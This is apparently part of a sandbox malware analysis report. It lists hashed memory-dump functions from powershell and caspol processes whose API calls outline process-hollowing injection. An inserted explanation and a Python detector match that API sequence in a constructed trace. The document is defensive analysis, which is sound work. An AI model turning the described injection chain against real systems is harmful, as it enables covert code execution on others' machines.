• Instruction ID: 6e211525aa625fc491f685bb2c07a48364a459d49ca25601d2371e88477f41e3
• Opcode Fuzzy Hash: 0d46b230baad3e9d7e278be51a8a8da29d2b2eb72adc0c7add9055ac0f3fb555
• Instruction Fuzzy Hash: E922063090CB894FE75ADB2C94507797BE2FF9A344F2401AED48ED72A3DA24AC56C741

Control-flow Graph

Memory Dump Source
• Source File: 00000005.00000002.475626527.000007FE89270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7fe89270000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: f97dbf291516746ce1a5288c1a7c6b0f0b05bf4a6bb441d0f22d3ec93f6cdcdb
• Instruction ID: 121c73ebc0423fdaedf3bfbab35958b86fd17d8ee5437cfcce11cb1aa89245a0
• Opcode Fuzzy Hash: f97dbf291516746ce1a5288c1a7c6b0f0b05bf4a6bb441d0f22d3ec93f6cdcdb
• Instruction Fuzzy Hash: E1A1BF21A0EBCA0FE347973858647617FE1EF97254B1901EBD48DCB1B3D6189C5AC362
Memory Dump Source
• Source File: 00000005.00000002.475626527.000007FE89270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7fe89270000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 7805957e58b4a07f57a139038f1fd39241f7b59bbdf04c9c3560f2d0ca48cfa9
• Instruction ID: 520f1e10a1cc999815b7e8587e8ac89896fa4c171fd6c046fd14efca6f43186f
• Opcode Fuzzy Hash: 7805957e58b4a07f57a139038f1fd39241f7b59bbdf04c9c3560f2d0ca48cfa9
• Instruction Fuzzy Hash: F092F43190D7CA5FF31AA738A8112B97FE1EF87254F1901EFD48AD71A3D618681AC352
Memory Dump Source
• Source File: 00000005.00000002.475626527.000007FE89270000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89270000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_7fe89270000_powershell.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: dbd1e7d5ca98851ffc8faf9010d8d71111460f4edaa451f674efd5c8c3d3f69b
• Instruction ID: 281f99f406f91c353f896bbe831b4318401aea875869bfb58f35eb644f1603af
• Opcode Fuzzy Hash: dbd1e7d5ca98851ffc8faf9010d8d71111460f4edaa451f674efd5c8c3d3f69b
• Instruction Fuzzy Hash: 75218801A4EBD50FE703933868A42A17FA1AF87124B0E00D7D489CF1F3D80C5D2AD3A2

Execution Graph

Execution Coverage: 15.5%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 161
Total number of Limit Nodes: 8
execution_graph (node listing omitted; APIs referenced in the graph: CreateProcessA, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext, ResumeThread)

Control-flow Graph

Strings
Memory Dump Source
• Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
Similarity
• API ID:
• String ID: 4,p$$p$$p
• API String ID: 0-3634262024
• Opcode ID: 23316e87c331fe002e2e71a9e0c288703bfc01fa41966e71965d0861ef8c7ae4
• Instruction ID: 437f7224c14b28d1fb8c4dc026fb59ebd4d13b90e0d23ded465a3d62620c9285
• Opcode Fuzzy Hash: 23316e87c331fe002e2e71a9e0c288703bfc01fa41966e71965d0861ef8c7ae4
• Instruction Fuzzy Hash: E9410370D04208DFDB08DFA9D8587EEBFB2BF89300F2091AAD015AB2A5DB741941DF84

Control-flow Graph

APIs
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0038E597
Memory Dump Source
• Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_380000_caspol.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 51634b39b0ff80be0bd0c76116776228f8349abcd9a6b9cff732597c492fca72
• Instruction ID: 47e367f176d176e1f8e40a740b8ac36597daea846bfc53d6cded6d26df568724
• Opcode Fuzzy Hash: 51634b39b0ff80be0bd0c76116776228f8349abcd9a6b9cff732597c492fca72
• Instruction Fuzzy Hash: 8FC13770D002198FDF25DFA8C845BEEBBB1BF49304F0095AAD819B7290DB749A85CF95

Control-flow Graph

APIs
• CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0038E597
Memory Dump Source
• Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_380000_caspol.jbxd
Similarity
• API ID: CreateProcess
• String ID:
• API String ID: 963392458-0
• Opcode ID: 7ae855911e1277527fc01cd245986d3cc581a5d77dd91d83e4397acd4f61b71d
• Instruction ID: 5c4e6de747d24dc470acac41df273fadcd752d8021a52789deda8a35f5a72943
• Opcode Fuzzy Hash: 7ae855911e1277527fc01cd245986d3cc581a5d77dd91d83e4397acd4f61b71d
• Instruction Fuzzy Hash: 47C13770D002198FDF25DFA8C845BEEBBB1BF49304F0095AAD819B7290DB749A85CF95

Control-flow Graph

control_flow_graph (basic blocks and edges):
• 38df31-38dfa3 -> 38dfba-38e021 (WriteProcessMemory), 38dfa5-38dfb7
• 38dfa5-38dfb7 -> 38dfba-38e021
• 38dfba-38e021 (WriteProcessMemory) -> 38e02a-38e07c, 38e023-38e029
• 38e023-38e029 -> 38e02a-38e07c
APIs
• WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038E00B
Memory Dump Source
• Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_380000_caspol.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID:
• API String ID: 3559483778-0
• Opcode ID: 85283234250803a864cbf8f408f2d64aa2ed9a2164fac6e6d8b40e3c2422baca
• Instruction ID: ffcee859201791522e53468664f5aed78a6e947f8de1f02e21f1ff0a3eaa9019
• Opcode Fuzzy Hash: 85283234250803a864cbf8f408f2d64aa2ed9a2164fac6e6d8b40e3c2422baca
• Instruction Fuzzy Hash: 024198B4D012489FCF10CFA9D984AEEFBF1AB49314F24942AE815B7250D375AA45CF64

                                                                      Control-flow Graph
                                                                      • Graph (rendered as an image in the original report): 38df38-38dfa3 -> 38dfa5-38dfb7 | 38dfba-38e021; 38dfa5-38dfb7 -> 38dfba-38e021 [WriteProcessMemory]; 38dfba-38e021 -> 38e023-38e029 | 38e02a-38e07c; 38e023-38e029 -> 38e02a-38e07c
                                                                      APIs
                                                                      • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038E00B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessWrite
                                                                      • String ID:
                                                                      • API String ID: 3559483778-0
                                                                      • Opcode ID: c7cd2df449152b3f3895aba81fd0bdd19973f4fe81cee8e710977cf876f7551d
                                                                      • Instruction ID: 48ac77a1f44e0d93ab0655da4d2528bf103366499d1b50982e90ea6959161cf1
                                                                      • Opcode Fuzzy Hash: c7cd2df449152b3f3895aba81fd0bdd19973f4fe81cee8e710977cf876f7551d
                                                                      • Instruction Fuzzy Hash: D441A9B4D002489FCF00CFAAD984AEEFBF1BB49314F24942AE815B7250D375AA45CF64

                                                                      Control-flow Graph
                                                                      • Graph (rendered as an image in the original report): 38e090-38e160 [ReadProcessMemory] -> 38e162-38e168 | 38e169-38e1bb; 38e162-38e168 -> 38e169-38e1bb
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038E14A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 552ec85157fd54966f24bd3193509683270288495d2165b7232bcd303bfc7b8f
                                                                      • Instruction ID: 1dbf546a6930c165651208d0a490502fd8372bb51f477f944083ff248ce5e81f
                                                                      • Opcode Fuzzy Hash: 552ec85157fd54966f24bd3193509683270288495d2165b7232bcd303bfc7b8f
                                                                      • Instruction Fuzzy Hash: C641A8B9D002589FCF10CFA9D984AEEFBB1BB49314F24942AE815B7350C734AA45CF64

                                                                      Control-flow Graph
                                                                      • Graph (rendered as an image in the original report): 38e098-38e160 [ReadProcessMemory] -> 38e162-38e168 | 38e169-38e1bb; 38e162-38e168 -> 38e169-38e1bb
                                                                      APIs
                                                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0038E14A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: MemoryProcessRead
                                                                      • String ID:
                                                                      • API String ID: 1726664587-0
                                                                      • Opcode ID: 8d7815b07efac4e3217518f0422e3272688b0b1c41bf47e8d2ef22c20b1826e0
                                                                      • Instruction ID: 9fb84959db46924984b6894cac2fab1c00cd87a8038ba1f4cf78511e673af677
                                                                      • Opcode Fuzzy Hash: 8d7815b07efac4e3217518f0422e3272688b0b1c41bf47e8d2ef22c20b1826e0
                                                                      • Instruction Fuzzy Hash: CF41AAB9D002589FCF10CFA9D984AEEFBB1BF49314F24942AE815B7210D735A945CF64

                                                                      Control-flow Graph
                                                                      • Graph (rendered as an image in the original report): 38de09-38ded0 [VirtualAllocEx] -> 38ded2-38ded8 | 38ded9-38df23; 38ded2-38ded8 -> 38ded9-38df23
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0038DEBA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 5f4a1d724b8d3feaf18afe2774db7beff90d6d31332e1112b5030cfabe618203
                                                                      • Instruction ID: 58174448eb001c44be6279c0e6724520e09d3c190856ba8d57f656fbbd18bb29
                                                                      • Opcode Fuzzy Hash: 5f4a1d724b8d3feaf18afe2774db7beff90d6d31332e1112b5030cfabe618203
                                                                      • Instruction Fuzzy Hash: A74198B8D002489FCF10CFA9D984AEEBBB1AF59314F24942AE815BB354D735A906CF54

                                                                      Control-flow Graph
                                                                      • Graph (rendered as an image in the original report): 38de10-38ded0 [VirtualAllocEx] -> 38ded2-38ded8 | 38ded9-38df23; 38ded2-38ded8 -> 38ded9-38df23
                                                                      APIs
                                                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0038DEBA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: AllocVirtual
                                                                      • String ID:
                                                                      • API String ID: 4275171209-0
                                                                      • Opcode ID: 74e958968a0e1339930662e37f6a6d6e4cc2ed66d00d42218030b99747666a00
                                                                      • Instruction ID: 0cb6a8a47073644505d07b69338d2e24c64e48bc0c81569694712221e7dbbc20
                                                                      • Opcode Fuzzy Hash: 74e958968a0e1339930662e37f6a6d6e4cc2ed66d00d42218030b99747666a00
                                                                      • Instruction Fuzzy Hash: DB41A9B8D002489BCF10CFA9D984AAEFBB1BB49310F10942AE815BB314D735A905CFA4

                                                                      Control-flow Graph
                                                                      • Graph (rendered as an image in the original report): 38d8a1-38d908 -> 38d90a-38d91c | 38d91f-38d96d; 38d90a-38d91c -> 38d91f-38d96d [Wow64SetThreadContext]; 38d91f-38d96d -> 38d96f-38d975 | 38d976-38d9c2; 38d96f-38d975 -> 38d976-38d9c2
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0038D957
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: eda22145724633b6c583d9331185860ec7353d3748c54ca6019816944e69c621
                                                                      • Instruction ID: 4e6b62e121a9cdb6975e4919152261ef7986474d07e42d53e80824388c38b7bc
                                                                      • Opcode Fuzzy Hash: eda22145724633b6c583d9331185860ec7353d3748c54ca6019816944e69c621
                                                                      • Instruction Fuzzy Hash: 2641BBB5D002589FCF10DFA9D884AEEFBB1AF49314F24846AE455B7244C738AA49CF64

                                                                      Control-flow Graph
                                                                      • Graph (rendered as an image in the original report): 38d8a8-38d908 -> 38d90a-38d91c | 38d91f-38d96d; 38d90a-38d91c -> 38d91f-38d96d [Wow64SetThreadContext]; 38d91f-38d96d -> 38d96f-38d975 | 38d976-38d9c2; 38d96f-38d975 -> 38d976-38d9c2
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0038D957
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 41360ec09f4929af31c4dcab446ab900eb4391852077613e4d63ce234d4a86b5
                                                                      • Instruction ID: 3829027e02be0b8f170b4154fa675126beabd0cfbdf7046fc8ade48ba96e0e03
                                                                      • Opcode Fuzzy Hash: 41360ec09f4929af31c4dcab446ab900eb4391852077613e4d63ce234d4a86b5
                                                                      • Instruction Fuzzy Hash: 3741ACB5D002589FCF10DFA9D884AEEFBB1AF49314F24806AE415B7244D738A945CF54
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 0038D836
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 721de47c14d54e878141a0b8a82ef82127ae958a33b34fc5c79f9157a3a511db
                                                                      • Instruction ID: 9b5232bc295bb9c9af045fbb8a092dca36046da2331b55458ed661ccc28da171
                                                                      • Opcode Fuzzy Hash: 721de47c14d54e878141a0b8a82ef82127ae958a33b34fc5c79f9157a3a511db
                                                                      • Instruction Fuzzy Hash: 9C31CAB5D002089FCF14CFA9D984AEEFBB1AF49314F24846AE814B7340D734A906CF54
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 0038D836
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 004b7d03882be934d52bfa851acabd0bc4759fc631b704456377d6bca9611bcb
                                                                      • Instruction ID: 9d102da0591561b36cd727d9933889c529a91d3cc751a7da19c80584321ae664
                                                                      • Opcode Fuzzy Hash: 004b7d03882be934d52bfa851acabd0bc4759fc631b704456377d6bca9611bcb
                                                                      • Instruction Fuzzy Hash: 6B31BAB4D002189FCF14CFA9D984AAEFBB5AF49314F24946AE815B7340C735A905CF94
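The function stubs listed above all live in the same 0x380000 region of process 0000000B (the caspol snapshot) and together import exactly the Win32 calls used for process hollowing: CreateProcess to start a host, VirtualAllocEx and WriteProcessMemory to place a payload in it, ReadProcessMemory, Wow64SetThreadContext to point the host's 32-bit (WOW64) thread context at the payload, and ResumeThread to let it run. The report shows the call arguments only as `?`, so it cannot by itself tie the calls to one target handle. The script below is an added example, not Joe Sandbox code or part of this report: it walks a per-process API trace and raises a verdict only when the five stages occur in order against the handle returned by a CREATE_SUSPENDED CreateProcess. The trace line format, the `hProcess`/`hThread` fields and every handle and argument value are assumptions chosen for illustration.

```python
"""Flag the process-hollowing API sequence in a per-process API trace.

Added example for this section of the report; it is not Joe Sandbox code.
The trace lines below are constructed to mirror the APIs the report lists in
the 0x380000 region of process 0000000B (the caspol snapshot): CreateProcess,
VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, Wow64SetThreadContext
and ResumeThread. The line format, handle values and argument values are
assumptions; the report itself shows the arguments as '?'.
"""
import re
from collections import defaultdict

CREATE_SUSPENDED = 0x00000004  # dwCreationFlags bit: host starts suspended

# Hollowing stages in the order they must occur. Each stage lists the API names
# that satisfy it (the report's normalised "CreateProcess" plus the A/W exports).
STAGES = [
    ("spawn_suspended", {"CreateProcess", "CreateProcessA", "CreateProcessW"}),
    ("alloc_remote",    {"VirtualAllocEx"}),
    ("write_remote",    {"WriteProcessMemory"}),
    ("set_context",     {"SetThreadContext", "Wow64SetThreadContext"}),
    ("resume",          {"ResumeThread"}),
]

LINE_RE = re.compile(r"^(?P<pid>\d+)\s+(?P<api>\w+)\s*(?P<args>.*)$")
ARG_RE = re.compile(r'(\w+)=(0x[0-9a-fA-F]+|"[^"]*"|\S+)')


def parse_line(line):
    """Parse 'pid api key=value ...' into (pid, api, args); hex values become ints."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    args = {}
    for key, val in ARG_RE.findall(m.group("args")):
        args[key] = int(val, 16) if val.startswith("0x") else val.strip('"')
    return int(m.group("pid")), m.group("api"), args


def detect_hollowing(lines):
    """Return {pid: [api, ...]} for each pid whose trace completes all five stages.

    Stages must be hit in order. The remote-memory stages must use the process
    handle returned by the suspended CreateProcess (assumed to be logged as
    hProcess), so a debugger that only reads memory, or a normal non-suspended
    spawn followed by a write, does not advance the state machine. Calls that
    do not match the current stage (for example the ReadProcessMemory the
    report also lists) are tolerated and simply skipped.
    """
    state = defaultdict(lambda: {"stage": 0, "hproc": None, "chain": []})
    hits = {}
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        pid, api, args = parsed
        st = state[pid]
        if st["stage"] >= len(STAGES):
            continue
        name, apis = STAGES[st["stage"]]
        if api not in apis:
            continue
        if name == "spawn_suspended":
            if not args.get("dwCreationFlags", 0) & CREATE_SUSPENDED:
                continue
            st["hproc"] = args.get("hProcess")
        elif name in ("alloc_remote", "write_remote"):
            if args.get("hProcess") != st["hproc"]:
                continue
        st["chain"].append(api)
        st["stage"] += 1
        if st["stage"] == len(STAGES):
            hits[pid] = list(st["chain"])
    return hits


# Constructed trace (not from the report). pid 11 performs the full sequence,
# pid 20 only reads memory and resumes a thread (debugger-like), pid 30 spawns a
# child without CREATE_SUSPENDED and writes to it once.
SAMPLE_TRACE = """
11 CreateProcessW lpApplicationName="caspol.exe" dwCreationFlags=0x4 hProcess=0x2a4 hThread=0x2a8
11 ReadProcessMemory hProcess=0x2a4 lpBaseAddress=0x7ffdf008 nSize=0x4
11 VirtualAllocEx hProcess=0x2a4 lpAddress=0x400000 dwSize=0x2e000 flProtect=0x40
11 WriteProcessMemory hProcess=0x2a4 lpBaseAddress=0x400000 nSize=0x400
11 WriteProcessMemory hProcess=0x2a4 lpBaseAddress=0x401000 nSize=0x2a000
11 Wow64SetThreadContext hThread=0x2a8
11 ResumeThread hThread=0x2a8
20 ReadProcessMemory hProcess=0x1f0 lpBaseAddress=0x400000 nSize=0x1000
20 ResumeThread hThread=0x1f4
30 CreateProcessW lpApplicationName="notepad.exe" dwCreationFlags=0x0 hProcess=0x3b0 hThread=0x3b4
30 WriteProcessMemory hProcess=0x3b0 lpBaseAddress=0x400000 nSize=0x10
30 ResumeThread hThread=0x3b4
""".strip().splitlines()

if __name__ == "__main__":
    for pid, chain in detect_hollowing(SAMPLE_TRACE).items():
        print(f"pid {pid}: process hollowing sequence {' -> '.join(chain)}")
```

Run stand-alone, the script reports only pid 11. The ordering and handle checks are what keep the rule from firing on a debugger or on a parent that writes to a normally started child; the caveat for real traces is that a loader can split the stages across threads or reopen the target with OpenProcess, in which case the handle correlation needs to follow the target pid rather than a single handle value.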
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (
                                                                      • API String ID: 0-3887548279
                                                                      • Opcode ID: 1e0462014fde222e05c13e15d498308f61c74add02c85b22134747f4ce06036c
                                                                      • Instruction ID: e4594c2485e2c8fb9dc48fcc6b57fff71b70af64d2a0ea265e4f04fc2abd9abb
                                                                      • Opcode Fuzzy Hash: 1e0462014fde222e05c13e15d498308f61c74add02c85b22134747f4ce06036c
                                                                      • Instruction Fuzzy Hash: 5C01B675949218CFDB60CF64C988BECBBB9BB49304F5491D9D80DA3251C7319E86DF40
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f03d953cb6a665b99b32b44644170259e2d408590456460a01e2429722a0f297
                                                                      • Instruction ID: 656291f4ae379a4179de7472ac2f525bfde66a95d2e753d36002864eb8529802
                                                                      • Opcode Fuzzy Hash: f03d953cb6a665b99b32b44644170259e2d408590456460a01e2429722a0f297
                                                                      • Instruction Fuzzy Hash: 6751D4B4E05219CFCB04CFAAD9949AEFBF6BF89300F24A915D419A7356C770A841CF90
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ffb9a44221e7c8b79bbed4779f27d84056f98baac219dba554c626d746198259
                                                                      • Instruction ID: d1ced00f9a50497b501eac1c7f889eb706c8078f5ed0a10bc5fab13f820f8fb6
                                                                      • Opcode Fuzzy Hash: ffb9a44221e7c8b79bbed4779f27d84056f98baac219dba554c626d746198259
                                                                      • Instruction Fuzzy Hash: A5410875D4421ADFDB20CF65C844BE8BBB9BF99300F20A6EAD509B6240EB705AC5DF40
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ac4f5fda024f366a033b67049acf03748a8ffdcd73786102a5ba76fabf96797
                                                                      • Instruction ID: eea3ce823ded39128bcccf79e27f1920ddd92c792a6dbf92a6ed5c23f58ce66b
                                                                      • Opcode Fuzzy Hash: 3ac4f5fda024f366a033b67049acf03748a8ffdcd73786102a5ba76fabf96797
                                                                      • Instruction Fuzzy Hash: 7A41EB38949218CFCB64CF54C998BE8BBB5AB4A315F24A1DAC44EB3291D7319AC5DF00
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: be4ffc91c97b0e376fd3e48990ca68867a3867b16d442affce7d0b48b476bed6
                                                                      • Instruction ID: 3b2de78f6366ddec2c7831524a72760197b76f0dcc0e3b2ab2049e143710751f
                                                                      • Opcode Fuzzy Hash: be4ffc91c97b0e376fd3e48990ca68867a3867b16d442affce7d0b48b476bed6
                                                                      • Instruction Fuzzy Hash: 0C310B74E09219CFDB04CFAAD8986EEBFB5AF99300F14A82AD406A3351D7705846DF40
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 417f3ef901775910b7179f96f79d8ba656c06aee24f6ea54923b3f7de1a18e55
                                                                      • Instruction ID: e9c21cb86c1f635c15d5dd5b2a9574aba9fc5736cbc80d70fde1ef99ba92f634
                                                                      • Opcode Fuzzy Hash: 417f3ef901775910b7179f96f79d8ba656c06aee24f6ea54923b3f7de1a18e55
                                                                      • Instruction Fuzzy Hash: E931D474E002188FDB04DFA4D859AAEBBB2FF8A310F209129D409BB799DB305D41CF90
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: de75fc0d70551424879c85bf79906e3dd7a6ae7b502796fbac569102f99914a9
                                                                      • Instruction ID: 659f25d86203f94e351a62955da7db3d463ce5fa5053337594ac8a1f6b663dad
• Opcode Fuzzy Hash: de75fc0d70551424879c85bf79906e3dd7a6ae7b502796fbac569102f99914a9
• Instruction Fuzzy Hash: E33194B4D05248DFCB04DFE5E8994EDBBB5BF89310B20A02AE816AB755D7305942CF11
Memory Dump Source
• Source File: 0000000B.00000002.468343525.000000000033D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0033D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_33d000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1a267f806f6ebb33a19ee775fe420bbae3de6be51228db7ca6c47dc84699797f
• Instruction ID: 1f4a1d924d0206ae11ad3fca3e3eb65321403551cbb80be074aa7220e8809973
• Opcode Fuzzy Hash: 1a267f806f6ebb33a19ee775fe420bbae3de6be51228db7ca6c47dc84699797f
• Instruction Fuzzy Hash: CC21D4B5604240EFDB16CF14E9C0B26BBA5FB84314F34C9ADE8498B256C736D84ACB61
Memory Dump Source
• Source File: 0000000B.00000002.468343525.000000000033D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0033D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_33d000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: be8f781f43a066f1a8fb8df64f31c66aebabf1e3a7ca7bcd6c6c179c4b83a725
• Instruction ID: 56110748352d12fd77e890f80dc5e5bba7208c6554272c655abe471f2bde6dff
• Opcode Fuzzy Hash: be8f781f43a066f1a8fb8df64f31c66aebabf1e3a7ca7bcd6c6c179c4b83a725
• Instruction Fuzzy Hash: 7A21C5B5604240DFDB1ACF14E8C4B26BF65EB84714F34C569E8494B656C336D847CB61
Memory Dump Source
• Source File: 0000000B.00000002.468343525.000000000033D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0033D000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_33d000_caspol.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 23ea1ab1228b6360fd632fa0b615b43b6b21454dd832e5833278062370f2ed3e
• Instruction ID: 659a3cdd2746e14931b094aedeb1d7f576ec5f8beb474ceb86b64c3312b65f53
• Opcode Fuzzy Hash: 23ea1ab1228b6360fd632fa0b615b43b6b21454dd832e5833278062370f2ed3e
